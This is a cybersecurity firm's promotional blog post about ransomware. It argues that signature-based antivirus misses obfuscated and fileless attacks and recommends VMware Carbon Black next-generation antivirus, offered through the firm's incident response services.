Stopping Ransomware Cold: Lessons from the Front Lines

At Schneider Downs, we are all too familiar with the costly impact ransomware attacks can have on organizations of all sizes and across all industries. Our cyber team continues to respond to countless incidents, helping our clients identify, contain, eradicate and recover from a wide variety of compromises, the most common of which, and most devastating, being ransomware.

In Q1 of 2020 the reported average ransom demand was $111,605 which is significantly lower than many of the demands our team has experienced firsthand. What the monetary amount does not account for are the immeasurable costs including reputational damage, business interruption, customer perception, forensics experts and legal fees, just to name a few.

As incident responders, it’s our job to help minimize the impact of these attacks. A crucial component is having effective solutions readily available for our clients when they need it most and when it comes to stopping ransomware in its tracks, our team trusts VMware’s Carbon Black. That’s why one of our first steps in any ransomware attack is to deploy Carbon Black onto every endpoint as quickly as possible. If critical data and systems are being encrypted by threat actors, the existing antivirus clearly wasn’t cutting it and will likely be of little help.

What’s the big deal with next-generation antivirus (NGAV)?

Traditional antivirus products rely on unique file signatures, essentially just comparing each executable, attachment and web download to a list of known malware. Attackers have found that they can easily sidestep this type of solution by obfuscating their malicious code or by deploying “fileless” malware via Windows PowerShell or VBScript embedded in Office documents. These approaches either result in a new signature that the antivirus protection does not recognize as malicious or avoid antivirus scanning entirely by hiding in the endpoint’s runtime memory, or RAM.

Carbon Black’s next-generation antivirus behavioral analytics and unique, data-driven prevention technology is certified to replace traditional antivirus, using predictive modeling that identifies and stops more known and unknown threats including malware, “fileless” attacks and of course, ransomware behavior. As incident responders we appreciate the endpoint detection and response (EDR) features, such as remote quarantine and rapid triage for the quick containment and analysis of pesky malware.

As trusted cybersecurity advisors, we understand how frustrating it can be to ask all the right questions, hire the smartest people, lock everything down, perform countless audits, remediate every finding, invest reasonably at every turn, and still end up a victim of a ransomware attack because of a reliance on traditional antivirus products and their poorly communicated, yet significant, limitations.

The simple truth is that without a next-generation antivirus (NGAV) or endpoint detection and response (EDR) solution, your environment will always be susceptible to a modern ransomware attack. As countless tales have taught us, an ounce of prevention is worth a pound of cure.

How Can Schneider Downs Help?

Our team can help test the effectiveness of your existing products, offer guidance on which Carbon Black features make the most sense for your organization and even provide pricing discounts by taking advantage of our incident response team’s partnership with VMware. As with any product, configuration is key, so be sure to leverage a trusted advisor like us to ensure proper tuning and execute test payloads against it to validate its effectiveness. Just let us know how we can help.

To learn more about our team and capabilities, including our Ransomware Security Service visit our Cybersecurity Website or contact us at [email protected].

If you are experiencing or suspect an incident, our Incident Response Team is available around the clock at 1-800-993-8937.

You’ve heard our thoughts… We’d like to hear yours

The Schneider Downs Our Thoughts On blog exists to create a dialogue on issues that are important to organizations and individuals. While we enjoy sharing our ideas and insights, we’re especially interested in what you may have to say. If you have a question or a comment about this article – or any article from the Our Thoughts On blog – we hope you’ll share it with us. After all, a dialogue is an exchange of ideas, and we’d like to hear from you. Email us at [email protected].

Material discussed is meant for informational purposes only, and it is not to be construed as investment, tax, or legal advice. Please note that individual situations can vary. Therefore, this information should be relied upon when coordinated with individual professional advice.

© 2021 Schneider Downs. All rights-reserved. All content on this site is property of Schneider Downs unless otherwise noted and should not be used without written permission.

our thoughts on
TSA Issues Second Cybersecurity Directive for Pipeline Owners and Operators
Benefits of a Purple Team Assessment
Understanding Windows 11 TPM Support Requirements
Jen Easterly Named Director of the Cybersecurity and Infrastructure Security Agency
Summertime, Learning Strides, and Cybersecurity
Register to receive our weekly newsletter with our most recent columns and insights.
Have a question? Ask us!

We’d love to hear from you. Drop us a note, and we’ll respond to you as quickly as possible.

Ask us
contact us
Map of Pittsburgh Office
Pittsburgh

One PPG Place, Suite 1700
Pittsburgh, PA 15222

[email protected]
p:412.261.3644     f:412.261.4876

Map of Columbus Office
Columbus

65 East State Street, Suite 2000
Columbus, OH 43215

[email protected]
p:614.621.4060     f:614.621.4062

Map of Washington Office
Washington, D.C.

1660 International Drive, Suite 600
McLean, VA 22102

[email protected]
p:571.380.9003

This site uses cookies to ensure that we give you the best user experience. Cookies assist in navigation, analyzing traffic and in our marketing efforts as described in our Privacy Policy.

×